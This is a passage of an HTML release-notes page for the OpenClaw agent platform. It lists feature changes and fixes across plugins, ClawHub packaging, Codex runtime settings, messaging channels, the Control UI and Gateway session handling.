data-hovercard-url="/openclaw/openclaw/issues/68782/hovercard" href="https://github.com/openclaw/openclaw/issues/68782">#68782</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Enderfga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Enderfga">@Enderfga</a>.</p>
</li>
<li>
<p>Tools: add a platform-level tool descriptor planner for descriptor-first visibility, generic availability checks, and executor references. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/tools: cache plugin tool descriptors captured from <code>api.registerTool(...)</code> so repeated prompt-time planning can skip plugin runtime loading while execution still loads the live plugin tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368991903" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76079" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76079/hovercard" href="https://github.com/openclaw/openclaw/pull/76079">#76079</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Docs/Codex: clarify that ChatGPT/Codex subscription setups should use <code>openai/gpt-*</code> with <code>agentRuntime.id: "codex"</code> for native Codex runtime, while <code>openai-codex/*</code> remains the PI OAuth route. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Plugins/source checkout: load bundled plugins from the <code>extensions/*</code> pnpm workspace tree in source checkouts, so plugin-local dependencies and edits are used directly while packaged installs keep using the built runtime tree. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: externalize ACPX behind the official <code>@openclaw/acpx</code> package so packaged installs keep ACP harness adapter binaries out of core until the ACP backend is installed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: externalize diagnostics OpenTelemetry behind the official <code>@openclaw/diagnostics-otel</code> package so packaged installs keep the OTEL dependency stack out of core until the plugin is installed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare Google Chat, LINE, Matrix, and Mattermost for <code>2026.5.1-beta.2</code> npm and ClawHub publishing, and keep publishable plugin dist trees out of the core npm package. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare BlueBubbles, diagnostics Prometheus, Google Meet, Nextcloud Talk, Nostr, Zalo, and Zalo Personal for <code>2026.5.1-beta.2</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare diagnostics OpenTelemetry, Discord, Diffs, Lobster, Memory LanceDB, Microsoft Teams, QQ Bot, Voice Call, and WhatsApp for <code>2026.5.1-beta.1</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare Brave, Codex, Feishu, Synology Chat, Tlon, and Twitch for <code>2026.5.1-beta.1</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Providers/xAI: add Grok 4.3 to the bundled catalog and make it the default xAI chat model.</p>
</li>
<li>
<p>Google Meet: let API-created rooms set <code>accessType</code> and <code>entryPointAccess</code>, and add <code>googlemeet end-active-conference</code> for closing managed spaces after a call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355261280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74824" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74824/hovercard" href="https://github.com/openclaw/openclaw/pull/74824">#74824</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a>.</p>
</li>
<li>
<p>Google Meet: add <code>googlemeet test-listen</code> and the matching <code>google_meet</code> <code>test_listen</code> action so transcribe-mode joins wait for real caption or transcript movement before reporting listen-first health. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: prefer versioned ClawPack artifacts when ClawHub publishes digest metadata, verifying the ClawPack response header and downloaded bytes before installing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: persist ClawPack digest metadata on ClawHub plugin install and update records so registry refreshes and download verification can reuse stored artifact facts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: allow official bundled-plugin cutovers to record ClawHub artifact metadata while preserving npm as the launch default for bare package specs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/onboarding: allow install-on-demand provider setup entries to persist ClawHub artifact metadata after explicit ClawHub installs while retaining npm/local fallback paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/Crestodian: add ClawHub plugin search plus Crestodian plugin list/search/install/uninstall operations, with approval and audit coverage for install and uninstall.</p>
</li>
<li>
<p>Channels/thread bindings: replace split subagent/ACP thread-spawn toggles with <code>threadBindings.spawnSessions</code>, default thread-bound spawns on, and let <code>openclaw doctor --fix</code> migrate the legacy keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367850512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75943/hovercard" href="https://github.com/openclaw/openclaw/pull/75943">#75943</a>)</p>
</li>
<li>
<p>Providers/OpenAI: add <code>extraBody</code>/<code>extra_body</code> passthrough for OpenAI-compatible TTS endpoints, so custom speech servers can receive fields such as <code>lang</code> in <code>/audio/speech</code> requests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041341848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39900" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39900/hovercard" href="https://github.com/openclaw/openclaw/issues/39900">#39900</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/R3NK0R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/R3NK0R">@R3NK0R</a>.</p>
</li>
<li>
<p>Dependencies: refresh workspace dependency pins, including TypeBox 1.1.37, AWS SDK 3.1041.0, Microsoft Teams 2.0.9, and Marked 18.0.3. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/aws/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aws">@aws</a>, and <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/microsoft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/microsoft">@microsoft</a>.</p>
</li>
<li>
<p>Discord/channels: add reusable message-channel access groups plus Discord channel-audience DM authorization, so allowlists can reference <code>accessGroup:&lt;name&gt;</code> across channel auth paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366657956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75813" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75813/hovercard" href="https://github.com/openclaw/openclaw/pull/75813">#75813</a>)</p>
</li>
<li>
<p>Crabbox/scripts: print the selected Crabbox binary, version, and supported providers before <code>pnpm crabbox:*</code> commands, and reject stale binaries that lack <code>blacksmith-testbox</code> provider support.</p>
</li>
<li>
<p>Agents/Codex: add committed happy-path prompt snapshots for Codex/message-tool Telegram direct, Discord group, and heartbeat turns so prompt drift can be reviewed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Dependencies: refresh bundled runtime and plugin dependency pins, including Pi 0.71.1, OpenAI 6.35.0, Codex 0.128.0, Zod 4.4.1, and Matrix 41.4.0. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Agents/workspace: add <code>agents.defaults.skipOptionalBootstrapFiles</code> for skipping selected optional workspace files during bootstrap without disabling required workspace setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213876746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62110" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62110/hovercard" href="https://github.com/openclaw/openclaw/pull/62110">#62110</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mainstay22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mainstay22">@mainstay22</a>.</p>
</li>
<li>
<p>Plugins/CLI: add first-class <code>git:</code> plugin installs with ref checkout, commit metadata, normal scanner/staging, and <code>plugins update</code> support for recorded git sources. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/badlogic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/badlogic">@badlogic</a>.</p>
</li>
<li>
<p>Google Meet: add live caption health for Chrome transcribe mode, including caption observer state, transcript counters, last caption text, and recent transcript lines in status and doctor output. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Voice Call/Google Meet: add Twilio Meet join phase logs around pre-connect DTMF, realtime stream setup, and initial greeting handoff for easier live-call debugging. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>macOS app: move recent session context rows into a Context submenu while keeping usage and cost details root-level, so the menu bar companion stays compact with many active sessions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Guti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Guti">@Guti</a>.</p>
</li>
<li>
<p>Gateway/SDK: add SDK-facing tools.invoke RPC with shared HTTP policy, typed approval/refusal results, and SDK helper support. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354626015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74705/hovercard" href="https://github.com/openclaw/openclaw/issues/74705">#74705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</p>
</li>
<li>
<p>Discord: keep active buttons, selects, and forms working across Gateway restarts until they expire, so multi-step Discord interactions are less likely to break during upgrades or restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Messages/docs: clarify that <code>BodyForAgent</code> is the primary inbound model text while <code>Body</code> is the legacy envelope fallback, and add Signal coverage so channel hardening patches target the real prompt path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258357958" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66198" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66198/hovercard" href="https://github.com/openclaw/openclaw/pull/66198">#66198</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defonota3box/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defonota3box">@defonota3box</a>.</p>
</li>
<li>
<p>Slack: publish a safe default App Home tab view on <code>app_home_opened</code> and include the Home tab event in setup manifests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3911903854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11655/hovercard" href="https://github.com/openclaw/openclaw/issues/11655">#11655</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114456932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52020" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52020/hovercard" href="https://github.com/openclaw/openclaw/issues/52020">#52020</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</p>
</li>
<li>
<p>Slack: keep track of bot-participated threads across restarts, so ongoing threaded conversations can continue auto-replying after the Gateway is restarted. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Control UI/Usage: add UTC quarter-hour token buckets for the Usage Mosaic and reuse them for hour filtering, keeping the legacy session-span fallback for older summaries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350628281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74337/hovercard" href="https://github.com/openclaw/openclaw/pull/74337">#74337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</p>
</li>
<li>
<p>BlueBubbles: add opt-in <code>channels.bluebubbles.replyContextApiFallback</code> that fetches the original message from the BlueBubbles HTTP API when the in-memory reply-context cache misses (multi-instance deployments sharing one BB account, post-restart, after long-lived TTL/LRU eviction). Off by default; channel-level setting propagates to accounts that omit the flag through <code>mergeAccountConfig</code>; routed through the typed <code>BlueBubblesClient</code> so every fetch is SSRF-guarded by the same three-mode policy as every other BB client request; reply-id shape is validated and part-index prefixes (<code>p:0/&lt;guid&gt;</code>) are stripped before the request; concurrent webhooks for the same <code>replyToId</code> coalesce into one fetch and successful responses populate the reply cache for subsequent hits. Also promotes BlueBubbles attachment download failures from verbose to runtime error so silently-dropped inbound images are visible at default log level, and extends <code>sanitizeForLog</code> to redact <code>?password=…</code>/<code>?token=…</code> query params and <code>Authorization:</code> headers before they reach the log sink (CWE-532). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329493815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71820/hovercard" href="https://github.com/openclaw/openclaw/pull/71820">#71820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</p>
</li>
<li>
<p>CLI/proxy: add <code>openclaw proxy validate</code> so operators can verify effective proxy configuration, proxy reachability, and expected allow/deny destination behavior before deploying proxy-routed OpenClaw commands. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341892839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73438" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73438/hovercard" href="https://github.com/openclaw/openclaw/pull/73438">#73438</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</p>
</li>
<li>
<p>Agents/Codex: default Codex app-server dynamic tools to native-first, keeping OpenClaw integration tools while leaving file, patch, exec, and process ownership to the Codex harness. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361939028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75308" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75308/hovercard" href="https://github.com/openclaw/openclaw/pull/75308">#75308</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Agents/Codex: default Codex-harness direct source replies to the OpenClaw <code>message</code> tool when visible reply delivery is not explicitly configured, keeping channel-visible output as a deliberate tool call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Heartbeats/agents: add a structured <code>heartbeat_respond</code> tool for tool-capable heartbeat runs so agents can record quiet outcomes or explicit notification text without relying only on <code>HEARTBEAT_OK</code> parsing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Gateway/config: allow <code>$include</code> directives to read files from operator-approved <code>OPENCLAW_INCLUDE_ROOTS</code> directories while preserving default config-directory confinement. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ificator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ificator">@ificator</a>.</p>
</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>
<p>Agents/OpenAI: default GPT-5 API-key sessions to the SSE Responses transport unless WebSocket is explicitly selected, restoring replies in fresh Control UI and WebChat beta installs where the auto WebSocket path connected but produced no model events.</p>
</li>
<li>
<p>Agents/sessions: preserve terminal lifecycle state when final run metadata persists from a stale in-memory snapshot, preventing sessions from staying stuck as running after completed or timed-out turns.</p>
</li>
<li>
<p>Gateway/CLI: make <code>openclaw gateway start</code> repair stale managed service definitions that point at old OpenClaw versions, missing binaries, or temporary installer paths before starting.</p>
</li>
<li>
<p>Updates/plugins: keep packaged upgrades and beta external plugin installs on stable runtime aliases and matching prerelease npm specs, avoiding stale WebChat runtime chunks and old Twitch packages after upgrading from 2026.4.29.</p>
</li>
<li>
<p>Codex/app-server: resolve managed binaries from bundled <code>dist</code> chunks and from the <code>@openai/codex</code> package bin when installs do not provide a nearby <code>.bin/codex</code> shim, avoiding false missing-binary startup failures.</p>
</li>
<li>
<p>Status: show the <code>openai-codex</code> OAuth profile for <code>openai/gpt-*</code> sessions running through the native Codex runtime instead of reporting auth as unknown. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369662899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76197" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76197/hovercard" href="https://github.com/openclaw/openclaw/pull/76197">#76197</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: use the ClawHub artifact resolver response as the install decision before downloading, keeping legacy ZIP fallback and future ClawPack npm-pack installs on the same explicit resolver path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: keep bare plugin package specs on npm for the launch cutover and reserve ClawHub resolution for explicit <code>clawhub:</code> specs until ClawHub pack readiness is deployed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/source checkout: discover source-only plugins such as Codex from the <code>extensions/*</code> workspace while using npm package excludes as the packaged-core boundary, removing the stale core-bundle metadata path.</p>
</li>
<li>
<p>Plugins/ClawHub: install ClawPack artifacts from the explicit npm-pack <code>.tgz</code> resolver path and persist artifact kind, npm integrity, shasum, and tarball metadata for update and diagnostics flows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Control UI: allow deployments to configure grouped chat message max-width with a validated <code>gateway.controlUi.chatMessageMaxWidth</code> setting instead of patching bundled CSS after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279800285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67935" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67935/hovercard" href="https://github.com/openclaw/openclaw/issues/67935">#67935</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiew4589-lang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiew4589-lang">@xiew4589-lang</a>.</p>
</li>
<li>
<p>Control UI/Cron: ignore malformed persisted cron rows without valid payloads before they enter UI state and guard stale cron render paths, preventing blank Control UI sections after a bad cron snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141837644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55047" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55047/hovercard" href="https://github.com/openclaw/openclaw/issues/55047">#55047</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134780011" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54439" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54439/hovercard" href="https://github.com/openclaw/openclaw/issues/54439">#54439</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136558129" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54550" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54550/hovercard" href="https://github.com/openclaw/openclaw/pull/54550">#54550</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136644421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54552/hovercard" href="https://github.com/openclaw/openclaw/pull/54552">#54552</a>.</p>
</li>
<li>
<p>Control UI/sessions: bound the default Sessions tab query to recent activity and fewer rows, avoiding expensive full-history loads while keeping filters editable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76050/hovercard" href="https://github.com/openclaw/openclaw/issues/76050">#76050</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76051" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76051/hovercard" href="https://github.com/openclaw/openclaw/pull/76051">#76051</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Neomail2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Neomail2">@Neomail2</a>.</p>
</li>
<li>
<p>Gateway/channels: cap startup fanout at four channel/account handoffs and recover from Bonjour ciao self-probe races, reducing Windows startup stalls with many Telegram accounts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364841887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75687/hovercard" href="https://github.com/openclaw/openclaw/issues/75687">#75687</a>.</p>
</li>
<li>
<p>Gateway/sessions: keep <code>sessions.list</code> polling responsive on large session stores by reusing list-safe session cache/indexes and returning a lightweight compaction checkpoint preview instead of heavyweight summaries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolandrscheel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolandrscheel">@rolandrscheel</a>.</p>
</li>
<li>
